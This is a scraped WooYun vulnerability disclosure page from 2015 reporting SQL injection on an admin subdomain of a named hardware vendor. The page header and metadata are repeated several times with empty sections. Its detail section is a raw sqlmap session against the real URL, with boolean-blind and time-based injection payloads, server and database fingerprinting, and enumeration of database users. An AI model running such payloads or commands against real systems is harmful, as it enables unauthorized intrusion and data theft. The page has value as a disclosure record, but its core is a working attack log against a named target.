某知名diy配件厂商某重要分站SQL注入#2 | wooyun-2015-0110564| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0110564

漏洞标题：某知名diy配件厂商某重要分站SQL注入#2

漏洞作者： #6c6c6c

提交时间：2015-05-06 18:07

修复时间：2015-06-20 18:08

公开时间：2015-06-20 18:08

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-06：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-06-20：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

sql

详细说明：

F:\Python26\sqlmap>sqlmap.py -u "http://admin.colorful.cn/Common/ShowImages.ashx
?id=1211f2cda51ea451429b84a603e6fc97cd51" --privileges
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 22:14:31
[22:14:31] [WARNING] using 'C:\Users\Administrator\.sqlmap\output' as the output
 directory
[22:14:31] [INFO] resuming back-end DBMS 'microsoft sql server'
[22:14:31] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1211f2cda51ea451429b84a603e6fc97cd51' AND 4809=4809 AND 'vGSu'='
vGSu
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: id=-2002' OR 3015=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers A
S sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysus
ers AS sys7) AND 'LHWh'='LHWh
---
[22:14:35] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[22:14:35] [WARNING] on Microsoft SQL Server it is not possible to fetch databas
e users privileges, sqlmap will check whether or not the database users are data
base administrators
[22:14:35] [INFO] fetching database users
[22:14:35] [INFO] fetching number of database users
[22:14:35] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[22:14:35] [INFO] retrieved: 8
[22:14:47] [INFO] retrieved: ##MS_PolicyEventProcessingLogin##
[22:24:09] [INFO] retrieved: ##MS_PolicyTsqlExecution

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0110564

漏洞标题：某知名diy配件厂商某重要分站SQL注入#2

相关厂商：七彩虹

漏洞作者： #6c6c6c

提交时间：2015-05-06 18:07

修复时间：2015-06-20 18:08

公开时间：2015-06-20 18:08

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 #6c6c6c@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0110564

漏洞标题：某知名diy配件厂商某重要分站SQL注入#2

相关厂商：七彩虹

漏洞作者： #6c6c6c

提交时间：2015-05-06 18:07

修复时间：2015-06-20 18:08

公开时间：2015-06-20 18:08

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0110564"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 #6c6c6c@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：